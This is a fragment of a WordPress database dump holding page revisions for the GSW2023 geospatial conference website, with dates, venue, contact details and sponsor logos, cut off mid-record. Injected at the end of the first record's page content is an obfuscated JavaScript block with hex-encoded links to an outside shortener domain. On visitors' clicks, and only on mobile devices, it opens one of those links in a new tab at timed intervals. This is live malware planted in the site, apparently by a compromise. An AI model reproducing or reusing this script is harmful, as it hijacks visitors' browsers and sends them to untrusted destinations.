btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"40\" bg_override=\"ex-full\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:31:48','2023-06-09 13:31:48','',3066,'https://gsw2023.com/?p=4636',0,'revision','',0),
(4637,1,'2023-06-09 13:32:35','2023-06-09 13:32:35','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a 